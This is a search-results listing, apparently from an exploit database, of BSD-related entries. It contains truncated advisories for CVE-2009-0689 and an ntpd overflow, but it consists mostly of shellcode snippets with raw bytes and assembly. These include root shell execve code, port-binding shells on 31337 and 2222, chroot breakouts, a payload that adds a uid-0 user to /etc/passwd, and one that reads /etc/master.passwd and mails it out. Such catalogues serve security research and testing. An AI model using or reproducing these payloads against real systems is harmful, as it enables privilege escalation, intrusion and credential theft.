1471 matches found
FreeBSD Meterpreter Service, Bind TCP
Stub payload for interacting with a Meterpreter Service This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 0 include Msf::Payload::Bsd include Msf::Payload::Single include...
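Memory corruption vulnerability in gdtoa/misc.c on multiple BSD systems
BUGTRAQ ID: 35510 CVECAN ID: CVE-2009-0689 OpenBSD, NetBSD and FreeBSD are popular BSD operating systems derived from Unix. The dtoa implementation in OpenBSD, NetBSD and FreeBSD contains an array overflow vulnerability. In src/lib/libc/gdtoa/gdtoaimp.h: - ---gdtoaimp.h--- ... define Kmax 15 ... - ---gdtoaimp.h--- The maximum Kmax length is 15; if a larger value (such as 17) is supplied, the program overflows the freelist array, and bss is 0x1. Taking NetBSD as an example: -...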
BSD (Multiple Distributions) - 'gdtoa/misc.c' Memory Corruption
source: https://www.securityfocus.com/bid/35510/info Multiple BSD distributions are prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index. Attackers may exploit this issue to execute arbitrary code within the context of affected...
BSD (Multiple Distributions) - gdtoamisc.c Memory Corruption
BSD Multiple Distributions - gdtoamisc.c Memory Corruption source: https://www.securityfocus.com/bid/35510/info Multiple BSD distributions are prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index. Attackers may exploit this iss...
ntpd autokey stack buffer overflow
Overview ntpd contains a stack buffer overflow, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system or create a denial of service. Description NTP Network Time Protocol is a method by which client machines can synchronize the local date and time wit...
kernel: memory disclosure in SO_BSDCOMPAT gsopt
The sock_getsockopt function in net/core/sock.c in the Linux kernel before 2.6.28.6 does not initialize a certain structure member, which allows local users to obtain potentially sensitive information from kernel memory via an SO_BSDCOMPAT getsockopt request...
Fedora Update for hsqldb FEDORA-2007-4119
Check for the Version of hsqldb OpenVAS Vulnerability Test Fedora Update for hsqldb FEDORA-2007-4119 Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under the term...
BSD/x86 - setuid/portbind - 94 bytes
No description provided by source. / $Id: portbind-bsd.c,v 1.3 2004/06/02 12:22:30 raptor Exp $ portbind-bsd.c - setuid/portbind shellcode for BSD/x86 Copyright c 2003 Marco Ivaldi [email protected] Simple portbind shellcode that bind's a setuid0 shell on port 31337/tcp based on bighawk's...
BSD/x86 - setuid/execve - 30 bytes
No description provided by source. / $Id: setuid-bsd.c,v 1.6 2004/06/02 12:22:30 raptor Exp $ setuid-bsd.c - setuid/execve shellcode for BSD/x86 Copyright c 2003 Marco Ivaldi [email protected] Short setuid0 and /bin/sh execve shellcode based on esdee's code. Tested on OpenBSD and FreeBSD. / ...
BSD/x86 - cat /etc/master.passwd & mail root@localhost - 92 bytes
No description provided by source. / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 92 bytes. execve/bin/sh -c "/bin/cat /etc/master.passwd|mail root@localhost"; you can replace the command with whatever you like. / char shellcode= "\xeb\x25" / jmp shellcode+39 / "\x59" / popl...
BSD/x86 - execve(/bin/sh) - 27 bytes
No description provided by source. / execvesh.c by n0gada 27 bytes. / include "stdio.h" char shellcode= "\xeb\x0d\x5f\x31\xc0\x50\x89\xe2" "\x52\x57\x54\xb0\x3b\xcd\x80\xe8" "\xee\xff\xff\xff/bin/sh"; int mainvoid int ret; printf"%d\n",strlenshellcode; ret = int &ret+2; ret = intshellcode; return...
BSD/x86 - execve(/bin/sh) & setuid(0) - 29 bytes
No description provided by source. / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 29 bytes. -setuid0; -execve/bin/sh; / char shellcode= "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\xb0\x17" // mov $0x17,%al "\x50" // push %eax "\xcd\x80" // int $0x80 "\x50" // push %eax...
Linux/x86 - symlink /bin/sh xoring
No description provided by source. /The shellcode calls the symlink and makes the link to the /bin/sh in the current dir. short version with anti IDS xoring size = 56 bytes OS = BSD written by /rootteam/dev0id www.sysworld.net [email protected] BITS 32 jmp short callme main: pop esi xor ecx,e...
BSD/x86 - execve(/bin/sh) Shellcode (28 bytes)
BSD/x86 - execve/bin/sh Shellcode 28 bytes. Shellcode exploit for BSDx86 platform / simply execvebinsh shellcode in 28 bytes written on nasm - my first nasm exp. greetz2: mig darknet /EFnet.org dev0id rus-sec /EFnet.org rootteam.void.ru / char shellcode =...
BSD/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)
BSD/x86 - Write to /etc/passwd with uid0 + gid0 Shellcode 74 bytes. Shellcode exploit for BSDx86 platform / writes the line for user in /etc/passwd with uid&gid == 0 OS: BSD length: 74 written by dev0id [email protected] rootteam.void.ru rus-sec /Efnet.org greetz: mig nerf BITS 32 main: xor eax,eax...
BSD/x86 - Break chroot (../ 10x Loop) Shellcode (40 bytes)
BSD/x86 - Break chroot ../ 10x Loop Shellcode 40 bytes. Shellcode exploit for BSDx86 platform / One of the smallest chroot shellcodes it will put '../' 10 times Size 40 bytes OS BSD /rootteam/dev0id rootteam.void.ru [email protected] BITS 32 jmp short callme main: pop esi mov edi,esi xor...
BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) + Bind TCP (2222/TCP) Shell Shellcode (133 bytes)
BSD/x86 - setuid0 + Break chroot ../ 10x Loop + Bind TCP 2222/TCP Shell Shellcode 133 bytes. Shellcode exploit for BSDx86 platform / The setuid0+chroot+bind shellcode it will: setuid0 put '../' 10 times in chroot open shell on 2222nd port Size 133 bytes OS BSD /rootteam/dev0id rootteam.void.ru...
BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) + execute /bin/sh Shellcode (57 bytes)
BSD/x86 - setuid0 + Break chroot ../ 10x Loop + execute /bin/sh Shellcode 57 bytes. Shellcode exploit for BSDx86 platform / The setuid0+chroot+execve shellcode it will: setuid0 put '../' 10 times in chroot execute /bin/sh Size 57 bytes OS BSD /rootteam/dev0id rootteam.void.ru [email protected]...